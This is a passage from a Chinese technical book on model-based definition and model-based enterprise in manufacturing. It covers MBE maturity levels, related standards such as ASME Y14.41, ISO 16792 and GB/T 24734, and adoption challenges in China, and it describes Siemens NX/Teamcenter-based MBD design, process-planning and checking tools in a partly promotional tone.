5级基础之上,但是增加了大量的自动化处理,使得自动化的TDP正式交付成为可能。它也消除了所有使用二维图纸的情况(也没有例外)。应当指出,Level 6被认为是一个远期目标并且目前也不知道有哪些组织已经达到了这个水平,但并不是说技术上不可用来实现它。这一级别具有如下特点: ·3D模型; ·不允许存在二维工程图; ·模型和元数据现在可以被整个扩展企业所访问、使用; ·完全自动化的TDP; ·有完全连接的扩展企业; ·内部和外部使用产品生命周期管理工具。 MBE的效益在MBD创建并在整个企业应用时就已经开始了,对于大型装备的原始制造商和供应商来说,在整个MBE企业的方案、设计、验证、制造、维护的各个环节都会带来如下实实在在的效益: ·缩短新订/经修订的产品的交付时间,并降低了工程设计的返工周期; ·整合并精简设计和制造流程,降低成本; ·生产规划时间减少,减少生产延误的风险; ·提高生产过程的设计质量,减少制造交货时间; ·减少工程变更,减少产品缺陷,提高首次质量; ·改善与利益相关者的合作、协同,缩减在产品的开发管理生命周期中的所有要素的周期和整体项目的成本; ·提高备件的采购效率; ·改进作业指导书和技术出版物的质量; ·在维修过程中的活动中提供互动的能力,以减少时间和维护产品。 2.2 中国企业实施MBD的实践与挑战 2.2.1 MBD技术应用状况 MBD技术采用包含了三维几何模型、尺寸和几何形位公差标注,以及属性注释等产品制造信息的单一主模型来完整表达产品定义信息,并将其作为产品制造过程中的唯一依据,从而实现设计、工艺、制造、检测等各业务的高度集成。MBD技术实现了单一数据源,消除了传统研发模式中的三维模型与二维图纸之间的信息冲突,减少了创建、存储和追踪的数据量,保证了产品制造信息的正确、快速传递,从而有效地缩短了产品研制周期,减少了重复工作,提高了企业生产效率和产品质量。 随着MBD技术应用的逐步深入,MBD技术在国外已经得到了广泛的认同和较为深入的应用,主要体现在: ·数字产品定义相关标准的制订和发布 。美国机械工程师协会于2003年发布了ASME 14.41“数字产品定义数据实践”标准,为MBD技术的应用设置了基本准则。该标准现今已经被国际标准化组织所采用,并于2006年采纳为ISO-16792“技术产品文件——数字产品定义数据实践”标准。另外,很多企业根据自身的特点和需求,在这些标准基础上,做了进一步研发工作,制订了自己的标准规范,例如波音公司制订了基于模型定义的MBD技术应用规范BDS-600系列,为顺利实现MBD技术的应用奠定了基础。 ·三维可视化JT文件格式标准ISO 14306发布,促进了MBD模型数据的共享和可视化 。2012年12月,ISO发布了ISO 14306“三维可视化JT文件格式”标准。轻量化的JTTM 数据格式可实现数字化三维产品数据在产品生命周期各阶段的实时共享和可视化。通过JT,制造商可在支持JT标准的大量计算机辅助设计(CAD)软件和产品生命周期管理(PLM)软件应用之间实现三维产品数据(即MBD模型数据)的即时、无缝传递,促进各业务环节和数据的有效协同。 ·MBD技术在国外众多企业中得到应用 。例如波音公司在以波音787为代表的新型客机研制过程中,全面采用了MBD技术,将三维产品制造信息(Product Manufacturing Information,PMI)与三维设计信息共同定义到产品的三维标注模型中,摒弃二维图样,直接使用三维标注模型作为制造依据,开创了飞机数字化设计制造的崭新模式;某些公司开始应用主模型驱动的技术,以具有PMI三维标注的模型作为单一数据源,贯穿产品研发的各个环节;另外,也有公司提出了3D PMI的计划,通过具有PMI的三维产品模型在产品研制各阶段的应用,不断完善企业的业务流程。 应用以主模型/PMI驱动的技术(其内涵与MBD相似)已经成为了国外航空企业的共识,通过多个应用案例的研究,大家都认同了以PMI驱动的少图纸或无图纸的产品研制流程,PMI驱动的最佳实践贯穿了整个产品全生命周期,具体包括: ·将PMI作为需求进行描述和管理; ·创建关联PMI的产品模型; ·基于PMI的公差仿真; ·PMI驱动的基于特征的加工; ·PMI驱动的CMM数控检测编程; ·将具有PMI的模型数据共享给供应商,使其更易于浏览查看; ·基于PMI的装配和3D现场作业指导说明; ·基于PMI的自制或外购; ·PMI在生产/供应商处的应用; ·PMI在MRO(维护/维修)中的应用; ·基于PMI的CMM执行和质量记录; ·PMI分析,规划与实做之间的比较。 MBD技术不仅在国外得到了应用,其应用的优势在国内也得到实践证明,例如:中航工业某设计研究院在某型号飞机机头物理样机的研制中,与制造单位合作,首次把全三维设计技术应用于型号的研制中。在此研制过程中,没有使用一张二维图样,全部使用三维模型,效果显著,得到了设计、制造及其行业内各方认可(此处内容摘自报刊、网络)。 MBD技术从2007~2008年开始逐步引入国内,现今,在国内的应用得到了快速的发展,主要表现在: ·MBD技术现已在国内得到了极大的推崇 ,包括航空、航天和国防等行业都在全面研究和应用MBD技术。众多的研究院所和企业已经开展了MBD技术的试点应用,并已经开始了基于MBD的产品设计模型数据的发放;部分单位还形成了自身的MBD应用规范。 ·有关MBD技术的研讨和交流持续进行 。近年来,有关MBD技术研究和应用的文章、资料不断增多,例如《大型飞机数字化制造工程》就对MBD技术及其在飞机部件中的应用进行了介绍。同时,随着MBD技术应用的深入,大家对MBD技术有了更深的认识并积累了更多的经验,有关MBD技术的研讨和技术交流也持续进行。 ·MBD技术应用标准规范的制订正在进行 。“SAC/TC146全国技术产品文件标准化技术委员会”根据目前我国机械制造企业的现状及具体情况,开展了基于模型定义的标准(Model Based Definition of Standards,MBDS)的制订工作,提出了MBDS标准的基本模型(摘自2012年SAC/TC146桂林会议MBD&S论文集),如图2-4所示。 图2-4 MBDS标准的基本模型 已经发布的部分成熟的MBD国家标准包括:GB/T 24734-2009“技术产品文件数字化产品定义数据通则”的标准,该标准从2010年9月开始实施;GB/T 26099-2010“机械产品三维建模通用规则”标准,该标准从2011年10月开始实施;GB/T 26100-2010“机械产品数字样机通用要求”标准,该标准从2011年10月开始实施;GB/T 26101-2010“机械产品虚拟装配通用技术要求”标准,该标准从2011年10月开始实施。 为了制定“机械产品三维图样技术规则”和“机械产品三维图样文件管理”标准,SAC/TC146全国技术产品文件标准化技术委员会在2012年组织了分属航空、汽车、铁道机车、通用机械等不同行业的企业开展了MBDS标准制订的试点工作,通过试点总结,为进一步完善标准内容提供依据。 另外,一些企业在实践中也制订了自己的MBD标准规范,从而帮助企业有效地推进MBD在企业中的实践应用。 虽然MBD技术在国内已经具有了一定的应用基础,但与国外发达企业相比,国内的企业在此方面仍然存在很大的差距,主要表现在: ·基于MBD技术的产品定义工作尚处于探索阶段,大部分企业处于试点或局部应用阶段; ·以MBD为核心的数字化工艺设计和产品制造模式尚不成熟,对如何进行三维零件机加工艺设计及在制造车间的应用还没有统一的认识; ·三维数字化模型并没有贯穿于整个产品数字化制造过程中; ·MBD的设计、制造和管理规范还有待完善; ·三维数字化设计制造一体化集成应用体系尚未贯通。 2.2.2 MBD技术对产品研发模式的影响 基于MBD的数字化产品研发模式的内涵是关键业务过程的无图纸化和全三维实现,这必将对以二维图纸或二维图纸加三维模型为数据传递依据的传统研发模式带来巨大的变革,其影响包括对产品设计、工艺规划、产品制造和检测等关键业务过程的影响,对供应商、合作伙伴及客户之间交流协同的影响,对标准化、档案、信息化等管理的影响,具体体现如下: ·产品设计 ·三维模型包含所有产品研制相关的信息,包括设计模型、注释、属性,这需要有效的工具来定义和管理; ·对三维模型上的信息进行分类管理和显示,便于不同的人员按照不同的视图进行快速查询; ·面向制造的设计,确保MBD模型既反映产品的物理和功能需求,即客户需求的满足,又满足可制造性,即创建的MBD模型能满足制造应用的需求,在后续的应用中可直接应用; ·产品设计与工艺制造的协同,实现产品研制的并行协同; ·设计结果的审校模式的转变,由基于图样的审校转变为基于三维模型的审校,并需要有相应的手段来实现基于三维模型的审校、圈阅及追踪。 ·工艺规划 工艺规划将以三维产品模型为依据,从二维文档卡片式工艺设计方式转变为结构化三维工艺设计方式,并且由三维可视化工序模型取代传统二维工序简图,从而实现工艺设计的: ·数据来源三维化; ·工艺结果结构化; ·工序模型三维化; ·工装设计三维化; ·工艺编制三维可视化; ·工艺仿真三维化; ·工艺输出三维化; ·车间执行三维化。 ·产品制造 ·操作信息的展示由现场的终端显示取代了图纸; ·数控作业所占比例大幅度提高。 ·质量检测 ·基于图样的检验转变为基于三维模型的检验; ·数控检测作业所占比例大幅度提高。 ·上、下游协同 ·基于技术要求、图样、报告的与用户、合作伙伴、供应商之间的交流沟通和交付方式,被三维模型的交流沟通、交付方式所取代。 ·标准化 ·需要有基于三维数字化产品研发的标准规范来适应新的产品研发模式。 ·档案和信息化平台 ·电子归档代替了实物归档; ·必须要有统一的PDM系统对三维电子数据进行有效的管理和维护。 2.2.3 MBD实现的挑战与对策 MBD将设计、制造、检验、管理信息融为一体,是目前被业界普遍认同的数字化设计、制造的先进技术,是数字化制造的关键技术之一,是未来设计技术的发展方向。但从上述MBD技术对产品研发模式的影响可以看出,MBD技术是产品定义方式的一次革命,不仅仅要解决技术问题,更主要的是要有效解决由此带来的对企业文化、管理体制、生产方式的冲突。MBD的实施是一项长期、复杂而又艰巨的工作,国内企业在MBD技术的应用方面还将面临以下诸多问题: ·MBD规范 ,还没有统一完善的MBD行业标准规范,正处于研究阶段; ·设计要求 ,下游部门和合作伙伴所需要的MBD文件覆盖了很多内容,并不是所有内容都可以在CAD中由设计师进行定义,同时企业中能够应用MBD技术的工程师、工人严重缺乏。 ·传统习惯 ,传统设计方法及设计习惯的阻碍与限制,特别对于制造部门,MBD的实施无疑是一场革命,将改变原有的研制流程,与现行生产、检验制度有很大的冲突。比如有些车间工人在生产工作中必须以设计图纸为依据,实施MBD后将大量取消二维图,使生产工作无依据。 ·设计效率 ,基于MBD的业务流程需要产生和管理海量数据模型和装配,MBD包含的信息远多于传统图纸,它涉及的具体工作也只是确定局部信息,而若缺乏有效的数据提取工具和技巧将有可能使工作效率变得更低。 ·数据传递 ,在编制者和使用者传递数据所选择的机制上会给各类供应商和合作伙伴带来压力,是否属于同一地理区域上的公司或者供应链是否是分散的?是否有合适的IT架构和查看软件工具等。 ·不同的应用领域标准要求 ,使用MBD数据的人员的需求变化比较大,如需要哪些MBD数据的子集?这些数据如何显示? 只有有效解决以上这些问题,才能进一步推动MBD技术在国内的普及应用,发挥其潜能。 以下是国内企业实施MBD时常见的挑战和应对策略。 ·基于MBD的产品设计 ·挑战: ·三维模型包含所有产品研制的信息; ·对三维模型上的信息进行分类管理和显示; ·面向制造的设计。 ·应对: ·根据行业和企业自身特色和产品特点,定义详细的企业标准,并按标准进行产品信息的定义和管理(见图2-5)。 图2-5 MBD模型信息管理规则 ·充分听取工艺、工装、检测人员的意见,本着便于制造和检测的原则,建立三维MBD模型,并利用合规性检查和可制造性检查工具确保设计结果满足制造的要求。 ·基于MBD模型的工艺设计 ·挑战: ·MBD模型数据的访问与浏览; ·工艺结构的快速搭建(见图2-6)。 图2-6 结构化工艺设计 ·零件工艺中工序模型的创建与编辑。 ·应对 ·轻量化数据的应用,实现数据的快速查看; ·典型工艺模板的应用,实现结构化工艺快速设计; ·WAVE技术和同步建模技术的应用,实现工序模型的关联设计(见图2-7)。 图2-7 三维工序模型的关联创建和表示 ·数控工序数据的编制与管理 ·挑战: ·NC加工程序的快速编制; ·NC加工程序的有序管理; ·数控加工的一次性正确制造。 ·应对 ·加工模板和基于特征加工等NC加工编程的自动化应用; ·基于PDM的加工数据管理; ·车间对加工数据的直接访问。 ·工作指令的生成和输出 ·挑战: ·工作指令的正确获取; ·工作指令的灵活呈现。 ·应对: ·独立文档:2D-PDF、3D-PDF、纸质; ·在线文档:EWI(电子作业指导书)。 ·基于MBD的FAI检验计划编制 ·挑战: ·质量规划中尺寸、注释和几何形位公差的提取和录入; ·被检对象的编号和拷屏图像。 ·应对: ·利用BCT自动提取PMI信息,将其存入Teamcenter作为对象管理,并按AS9102生成检验计划表格。 2.2.4 MBD的实施建议 MBD技术是产品定义方式的一次革命,MBD的实施是一项长期、复杂而又艰巨的工作,涉及信息化平台的支持、标准规范的建立、管理模式和人员培养等各方面。 ·有效的产品数据管理平台是成功应用MBD的基础。产品数据管理平台是产品研发的基础平台,支持产品研发的核心业务流程。将三维设计软件(如NX软件)存放于与之高度集成的产品数据管理平台系统中,才是实现MBD的唯一途径。 ·MBD模型的建立应与MBD标准和规范的建立紧密关联。需要针对各种不同的典型零部件,详细定义每种零部件的标准建模过程和方法,形成规范,并贯彻执行,确保三维模型的一致性以及三维建模的质量。 ·全面应用主模型技术是实现MBD的关键之所在。 ·数字化样机的建立将使MBD应用扩展到整个协同环境。基于轻量化模型的可视化,可以进行整机查看,便于在早期验证更多的问题,在整个企业流程中实现“可视化”。 ·知识的捕获和重用(聚焦设计)是实现三维设计的路径。 ·MBD要求实施基于设计/制造的并行协同流程。 为了顺利实施MBD,逐步实现从传统产品研发模式到MBD模式的平稳过渡,建议采用总体规划,分阶段由点到面,最终实现全企业MBD应用,即实现基于模型的企业MBE(Model Based Enterprise),如图2-8和图2-9所示。 ·第一阶段:打下基础 ·MBD标准规范定义; ·宣传贯彻MBD概念; ·对应工具培训; ·典型零部件MBD实现。 ·第二阶段:扩展 ·MBD标准规范完善; ·典型型号基于MBD设计实现; ·典型型号基于MBD工艺实现; ·典型型号基于MBD制造实现; ·典型型号基于MBD检测实现。 ·第三阶段:整合实现MBE ·所有型号基于MBD的实现; ·完善MBD/MBE标准规范。 图2-8 设计阶段实现MBD的过程 图2-9 贯穿于MBD的数字化制造的实现 2.3 MBD标准规范及在西门子软件系统中的实现 2.3.1 ASME Y14.41简介 ASME Y14.41-2003“数字产品定义数据实践”标准的开发最初是于1997年1月份在堪萨斯州由波音公司主办的一个会议上提出的,并在随后的1997年ASME春季会议上组成了项目成员,并开始了该标准的起草定义。 该标准为基于三维的数字化产品定义设置了基本准则,为三维数据贯穿设计、制造和检测的全方位应用奠定了基础。该标准于2003年7月被批准为美国国家标准,开始推广执行。 ASME Y14.41-2003“数字产品定义数据实践”标准包含了以下10部分: ·通用描述 ·数据集的标识与控制 ·数据集要求 ·设计模型要求 ·产品定义数据通用要求 ·注释与特殊符号 ·模型值与尺寸 ·正负公差 ·基准的应用 ·几何公差 ASME Y14.41-2003“数字产品定义数据实践”标准既适用于纯三维产品研发模式(Model Only),也适用于三维和二维混合的模式(Model and Drawing)。 图2-10 产品定义数据集 ·产品定义数据集(见图2-10)。ASME Y14.41-2003对完整地定义产品的数据进行了描述,除了模型数据、修订历史等之外,还包括材料、工艺、分析数据、测试要求等相关数据。针对全三维模式,可以不需要图纸。 ·模型数据(见图2-11)。模型数据包括:设计模型、注释、属性,其中注释是不需要进行查询等操作即可见的各种尺寸、公差、文本、符号等;而属性则是为了完整地定义产品模型所需的尺寸、公差、文本等,这些内容在图形上是不可见的,但可通过查询模型获取。 图2-11 MBD模型数据 模型数据的管理需要数据管理系统来提供数据集的控制和跟踪信息,包括对数据工作状态、评审状态、发布状态的控制,数据的存储、数据版本历史的记录等。 2.3.2 ISO-16792简介 国际标准化组织采用了ASME Y14.41-2003“数字产品定义数据实践”标准,并于2006年12月使其成为ISO标准,发布了ISO-16792“技术产品文件——数字产品定义数据实践”。 ISO-16792标准包括以下11个部分: ·范围 ·标准引用 ·术语与定义 ·数据集的标识与控制 ·数据集要求 ·设计模型要求 ·产品定义数据通用要求 ·注释与特殊符号 ·模型值与尺寸 ·基准的应用 ·几何公差 ISO-16792标准的内容与ASME Y14.41-2003的内容一致。 2.3.3 GBT 24734-2009简介 全国技术产品文件标准化技术委员会(SAC/TC146)于2009年根据ISO-16792“技术产品文件——数字产品定义数据实践”标准,发布了GBT 24734-2009“技术产品文件——数字化产品定义数据通则”标准。 GBT 24734-2009标准包括以下11个部分: ·术语和定义 ·数据集识别与控制 ·数据集要求 ·设计模型要求 ·产品定义数据通用要求 ·几何建模特征规范 ·注释要求 ·模型数值与尺寸要求 ·基准的应用 ·几何公差的应用 ·模型几何细节层级 GBT 24734-2009标准除了几何建模特征规范和模型几何细节层级两部分内容外,其余与ISO 16792标准的内容一致。 GBT 24734-2009标准的几何建模特征规范部分给出了三维CAD应用中几何建模特征的术语和定义、分类等方面的规范化要求。它将几何建模特征分为基本建模特征、附加建模特征和编辑操作特征几大类,如图2-12所示。 图2-12 几何建模特征 GBT 24734-2009标准的模型几何细节层级部分规定了产品数字化定义过程中三维模型的标准级表示、简化级表示和扩展级表示(见图2-13),以及螺纹、孔、埋头孔、倒角、沟槽、齿轮、轴承和螺纹弹簧等的各级表示要求。 ·标准级表示。在标准级表示中,对识别功能目的所需的几何形状和设计细节进行建模或显示。除非有特别说明,否则对小于最大长度0.5%以及表达功能目的所不需要的元素可不建模或不显示。 ·简化级表示。在简化级表示中,只有零件或装配体的基本形状需要建模或显示。倒角、沟槽、刻痕等元素以及内部细节不需要建模或显示。 ·扩展级表示。在扩展级表示中,所有的零件组成、模型特征的建模或显示都应能表现其完整的细节。在满足功能需要的前提下,建模或显示的精度可以低于零件或模型特征的实际形式。除非有特别说明,小于最大长度0.1%的元素可不建模或不显示。有限体积的内部细节只有在必要时方予显示。 图2-13 三维模型的几何细节层级表示示例 2.3.4 基于西门子软件的MBD规范 以上ASME Y14.41、ISO-16792和GBT 24734标准从立法的角度使三维模型的使用合法化,三维模型作为被这些标准批准的产品与制造信息的传递工具,贯穿产品的整个生命周期,促进产品研制过程的改进。 但是,这些标准只是规定了三维数字化产品定义的原则和基础框架,对具体操作层面的内容并没有规定。全三维数字化产品研发模式MBD的实现,离不开具体的产品数据管理系统和CAD/CAM等信息化工具,为了确保MBD技术实现的可操作性,需要针对特定的信息化工具和企业自身的情况,在ASME Y14.41,ISO-16792和GBT 24734标准规定的框架下详细定义MBD技术的应用规范。 西门子工业软件公司的Teamcenter+NX已经被众多的企业作为实现MBD技术的信息化平台,在国内外得到了广泛的应用,很多企业制定了基于Teamcenter+NX的MBD技术应用规范,例如以中航工业沈阳发动机研究所牵头制定了“基于模型的定义UGNX实施指南”规范,对在Teamcenter+NX进行三维几何模型的创建、三维标准的表达、数据的组织和管理等都进行了规范。下面是相关规范中的一些内容。 ·基于MBD应用的NX三维模型的通用要求: ·最终的交付模型应为满足产品设计要求的完整、精确三维模型。 ·三维模型应按1:1比例全尺寸建模。 ·除特殊要求外,三维模型应按名义尺寸建模。 ·除特殊要求外,零件模型应为单一实体模型。 ·一个NX部件文件只能定义一个零件模型,产品装配应使用UGNX装配功能实现。 ·基于MBD应用的NX三维标注的要求。 ·三维标注应基于NX的PMI功能定义。 ·三维标注信息应直观、明确。 ·三维标注信息应与其标注对象保持关联。 ·三维标注信息应标注在合理的标注平面上。 ·三维标注信息应建立在其指向的模型元素附近。 ·在视图方向上查看标注时,标注不应相互重叠。 ·在视图方向上查看标注时,标注文本不应遮挡模型的关键部位。 ·应尽可能以较少的视图和标注表达产品的完整信息。 ·三维标注应以视图进行组织和管理。 ·属性定义。通过NX的属性定义来给定文件属性和对象属性。 2.3.5 基于西门子软件的MBD应用系统 标准文档和规范文档需要融入MBD的信息化平台当中,才能得到充分的贯彻和执行。基于西门子软件的MBD应用系统是易之恒软件技术有限公司(http://www.njplm.com )针对MBD在数字化设计与工艺中的应用,运用NX OPEN、ITK等开发工具,将MBD的相关标准和规范融入NX与Teamcenter平台中,通过定制国标化、规范化、流程化、自动化的工具,帮助客户在已有的PMI技术基础上,方便快捷地完成各流程的设计与定义。 基于西门子软件的MBD应用系统包括MBD三维设计系统、MBD三维工艺系统、MBD标准检验系统三部分。 1.MBD三维设计系统 MBD三维设计系统是基于NX与Teamcenter平台,运用NX OPEN、ITK等开发工具,通过数据库与网络等开发技术为工程技术人员提供三维产品制造信息的标注、管理、查询、导出工具,辅助工程技术人员方便快捷地完成MBD模型的设计。 ·系统具有如下特点: ·采用C/S体系架构,客户端与CAX集成,服务端与PLM协同平台构建在同一服务器中,实现数据库共享; ·内嵌了MBD标准规范,创建的标注符合相关标准; ·集成了企业常用设计数据,通过图形化界面查询选用; ·采用对象组与模型视图复合结构组织、管理三维产品制造信息; ·具有支持查询、统计、汇总三维产品制造信息的功能。 ·系统主要内容和功能: ·尺寸公差标注 ·快速方便地生成符合HB 5800、GB/T 1800-79、GB/T 1801-79、GB/T 1802-79、GB/T 1803-79、GB/T 1800.1、GB/T 1800.2、GB/T 1800.3的尺寸公差。 ·常用尺寸公差 ·常用的尺寸公差包括上偏差、下偏差、等值偏差。支持在配置文件中添加自定义公差值。 ·形位公差标注 ·快速创建符合国标的形位公差,如图2-14所示。 ·支持的形位公差标准有:GB/T 1182-80、GB/T 1183-80、GB/T 1182-96。 图2-14 形位公差标注 ·标印 ·快速方便地生产和查询标印信息。 ·技术要求,如图2-15所示。 ·①支持多种特殊符号的输入。 ·②支持多种查找技术要求的方式。 ·③支持多种在CAX中显示技术要求的方式,如是否显示标题、编码或导引线。 ·④支持方便快捷地导入/导出技术要求库。 图2-15 技术要求 ·特殊PMI标注工具箱,如图2-16所示。 ·孔标注:创建带有孔特征参数信息的标注,如:孔直径、孔深度等信息。 ·球标注:针对球形实体自动创建三维标注。 ·倒角:创建带有倒角特征参数信息的标注,如:距离、角度等。 ·常用符号标注:提供一些常用符号的快速标注。 ·格式文本:支持复杂格式的文本输入。 ·φ与M转换:提供快捷的直径符号(φ)与螺纹符号(M)之间的转换,并支持在尺寸前后标注注释文字。 图2-16 特殊PMI标注 ·常用参数表如图2-17所示。 快速生成常用参数表,提供开放的接口,支持添加符合国标、企标的参数表。 ·加载种子配置信息,如图2-18所示。 依据MBD标准体系,设置三维产品制造信息的管理方式并建立建模模板,通过加载模板信息,完成MBD三维设计系统的设置。 ·PMI规则化检查,如图2-19所示。 通过检测、查询并显示所有PMI信息,通过自动或手工规则化,实现PMI分类、分组管理。显示的PMI信息包含所属视图、类型、数值。 图2-17 常用参数表 图2-18 模板加载 图2-19 PMI规则化检查 ·组对象管理,如图2-20所示。 对采用组方式管理的PMI进行重新编辑处理,实现PMI对象的组织管理。 图2-20 PMI组织和管理 ·PMI汇总统计,如图2-21所示。 通过添加类型过滤与视图过滤的方式,汇总、统计所有符合条件的PMI信息,并将PMI信息按一定的格式与内容显示在对话框上。 图2-21 PMI汇总统计 2.MBD三维工艺系统 MBD工艺设计系统根据三维工艺的特点与要求,基于NX和Teamcenter协同平台,通过开发形成的工艺设计系统,辅助工艺人员完成零件的三维工艺设计与车间工艺文档的设计。 系统具有如下特点: ·工艺结构化。在Teamcenter中创建和管理总工艺、工艺、工序、工艺资源等,形成结构化的零件工艺。 ·相对独立。完整的MBD零件工艺设计系统的主要功能包括:创建零件工艺结构、工艺路线设计、工艺资源调用、工序模型创建、PMI标注、工序卡片编制、合成整本工艺、流程审批、工艺规程修订等。 ·规范设计模型。工序模型之间的关系与创建模式,能够继承设计模型的PMI标注信息和相关属性,提高工艺设计效率。 ·系统集成了典型工艺、工装设备资源,能够实现Teamcenter协同平台与NX之间信息的实时交互。 ·制定规范的MBD结构化零件工艺设计流程、系统内嵌工艺设计标准环境和工序卡片模板,并可以对工艺数据进行标准检查与修正。 ·支持基于NX的二维工序图表创建,并以PDF格式输出。 系统的主要内容和功能: ·工艺数据组织与管理。 ·在PLM协同平台中构建包含总工艺、工艺、工序的零件工艺BOM。在CAX中,工艺、工序以装配的方式显示。如果工序还需细分工步,则通过视图的方式区分工步信息。 ·创建工艺,如图2-22所示。 图2-22 创建工艺 工艺(工艺规程)类型包括锻造工艺、铸造工艺、热处理工艺、焊接工艺、机加工艺、喷漆工艺和表面处理工艺。在零件工艺的结构中,放在总工艺下面,其下节点为工序。工艺编码和命名符合公司规范。 ·工艺路线设计,如图2-23所示。 在Teamcenter上定义工序类型,包括领料工序、锻造工序、铸造工序、热处理工序、焊接工序、机加工序、特种工序、检验工序、表面处理工序等。在零件工艺结构中,放在工艺(工艺规程)下面。根据零件工艺要求,创建不同工序、调整工序顺序等,工艺编码和命名符合公司规范。 图2-23 工艺路线设计 ·工序模型创建,如图2-24所示。 设计模型通过链接或克隆的方式引用到工艺BOM树下,作为最终检验模型存在;工序模型通过特征回溯、特征简化、特征分解、典型模型、特征共享等技术手段创建;通过开发实现零件与工序模型间PMI信息和模型的关联复制。 ·工艺设计标准环境设置,如图2-25所示。 基于行业和公司标准,设置工序模型的标准创建环境,具体环境设置包含:图层,模型及PMI标注信息的颜色、字体、线形等涉及国家标准的内容。 图2-24 PMI关联复制 图2-25 MBD工艺标准环境设置 ·PMI标注信息,如图2-26所示。 ·尺寸标注:直观方便地查看、选用、标注国标公差,而且尺寸偏差值能随模型基本尺寸的更改而自动更新。 ·形位公差标注:提供多种国标形位公差类型,直观方便地根据公差等级确定形位公差值,生成形位公差PMI。 ·格式文本:提供复杂格式的文本标注。 ·技术要求:调用工艺知识库中的技术要求,并显示在模型视图中。 图2-26 技术要求 ·PMI工步信息定义,如图2-27。 图2-27 PMI工步信息定义 在模型视图中直观方便地创建PMI工步信息,并支持工步包含特殊工艺符号,方便调整工步顺序。 ·检验顺序号定义,如图2-28所示。 图2-28 检验顺序号定义 通过PMI的设置,自动生成PMI的加工顺序号,并在模型窗口中显示;为后续三维工艺卡片中检验数据的定义做准备;可以设定加工顺序的起始号并进行更新。 ·装夹找正位置定义,如图2-29所示。 在工序模型上,对加工面、基准面、定位面和夹紧面位置进行定义,并用不同颜色标识。 图2-29 装夹找正位置定义 ·工艺/工序属性定义,如图2-30所示。 实现对工艺/工序属性的填写及修改,还可以在工序间进行复制、粘贴属性值的操作和继承零件属性的操作。 ·工艺资源指派,如图2-31所示。 图2-30 工艺/工序属性定义 图2-31 工艺资源库调用 实现与PLM协同平台的集成,从PLM中获取工装、刀具、量具等工艺资源信息,并定义工艺资源;提供查询功能,实现工艺资源的便捷查询显示;提供虚拟装配,完成工装设备的定义与加载。 ·工序卡片导航器,如图2-32和图2-33所示。 工序卡片导航器方便用户进行添加新页、添加续页、删除选中页、替换选中页模板、上移卡片、下移卡片、编辑工序属性和返回工艺等操作。 图2-32 工序导航器 图2-33 工艺卡片模板调用 ·合成整本工艺 创建工艺规程封面、工序目录、工装目录、工序卡等工艺卡片的合并,生成整本工艺PDF。整本工艺按照一定的顺序排列,放置于工艺规程版本下。 3.MBD标准检验系统 MBD标准检验系统是基于PLM协同平台,根据MBD标准规范,通过数据库开发技术为工程技术人员提供三维模型及产品制造信息的检验工具,辅助标检人员完成数模的标准检验。 系统具有如下特点: 采用KF开发检验Checker,与系统的Check-Mate无缝集成; ·检验结果以HD3D的方式显示; ·检验的标准符合MBD标准规范。 ·系统主要内容和功能如图2-34所示。 图2-34 标准检验功能 2.4 西门子MBE解决方案综述 2.4.1 引言 “基于模型的企业(MBE)”已成为当代先进制造体系的具体体现,它的进展代表了数字化制造的未来。合理构建企业MBE的能力体系,能够减少50%~70%的非重复成本,缩短50%的上市时间。基于此,全世界众多装备制造企业正逐步加入到MBE企业能力建设的大军中。 MBE主要由基于模型的工程、基于模型的制造、基于模型的维护三大部分组成,并且在统一的系统工程的指导下形成有机的整体。MBE不仅仅局限在MBD模型的定义,它涵盖产品设计、制造和服务的完整的产品全生命周期业务,需要以MBD模型为核心,在各业务环节实现MBD模型的顺畅流通和直接重用。MBE的能力等级评价指标包括MBD模型数据、技术数据包、更改与配置管理、企业内外的制造数据交互、质量需求规划与检测数据、扩展企业的协同与数据交换等六个方面,其更加强调的是扩展企业跨供应链的产品全生命周期业务的MBD模型以及相关数据在企业内外能够顺畅流通、可直接重用。基于MBD的MBE生命周期如图2-35所示。 图2-35 基于MBD的MBE生命周期 完整的MBE能力体系构建,就是以MBD模型为统一的“工程语言”,按系统工程方法的指导,全面优化梳理企业内外、产品全生命周期业务流程、标准,采用先进的信息化技术,形成一套崭新的完整的产品研制能力体系。企业需要一套面向MBE的信息化环境,帮助企业实现MBD模型以及相关数据在企业内外能够顺畅流通、可直接重用。对于每一个制造企业,跨企业内外的产品全生命周期业务是非常复杂的,基于现有各自独立的信息化技术和工具,不可避免需要处理大量的系统集成和数据转换,才勉强能保障MBD模型以及相关数据的流通或可重用,这将是实现MBE企业面临的最大的问题。 西门子工业软件公司提供一整套完整的面向MBE的解决方案与服务,帮助企业形成完备的MBE能力体系,减少繁重的集成与数据转换工作,能实现最大限度的数据畅通与可直接重用。西门子工业软件不仅具备专项MBE能力与工具,更能聚合整个西门子的优势,为制造企业提供完整的MBE解决方案,支撑企业实现跨供应链的产品全生命周期的MBE业务。 2.4.2 西门子MBE解决之道 西门子支持行业客户的整个价值链——从产品设计到生产、服务,将自动化技术、产业控制技术和工业软件无缝地结合在一起。运用先进的全集成的软硬件解决方案,实现产品与生产的生命周期的集成,即打造数字化企业(工厂),实现虚拟世界与实物世界的无缝连接,帮助企业降低产品研发成本、缩短新产品上市时间,如图2-36所示。 图2-36 产品和生产的全生命周期的集成 多年来,西门子工业软件公司不断在内部PLM研发方面进行大量的投资,以完善其PLM相关的产品和解决方案,同时花费巨额资金,通过收购策略,扩充其解决方案,增加新的功能,帮助客户应对新的挑战。例如,2011年完成对Vistagy的收购,实现向复合材料设计与制造的深入;2013年完成对LMS的收购,实现向系统级仿真、专业试验等领域的拓展,如图2-37所示。 图2-37 收购策略扩充全生命周期解决方案的深度和广度 凭借西门子在工业自动化领域强大的软硬件全面集成的技术能力,以及完整的产品生命周期管理(PLM)解决方案的能力,西门子工业软件公司从一开始就积极参与MBD定义的技术开发、标准制定,以及诸多客户验证性项目的实践。经过多年的实践应用完善,形成了以NX为MBD定义工具、通过Tecnomatix直接基于MBD进行数字化制造、通过LMS进行仿真和试验、以Teamcenter为MBE企业提供全生命周期业务管理/数据重用/供应链协同的统一管理平台的全面的MBE解决方案,帮助制造企业打造完整的MBE能力体系,实现MBD模型横跨产品全生命周期的应用,如图2-38所示。 图2-38 MBD模型(包含PMI产品制造信息)在产品全生命周期管理的应用 ·NX,MBD定义工具 :NX作为CAD/CAE/CAM一体化工具,涵盖了概念设计、数字化产品定义、数字化仿真分析、评审分析、验证、多学科优化仿真分析等。它提供完整的MBD模型定义(三维产品模型加产品制造信息PMI)、浏览、交互的能力。 ·Tecnomatix,基于MBD的数字化制造解决方案 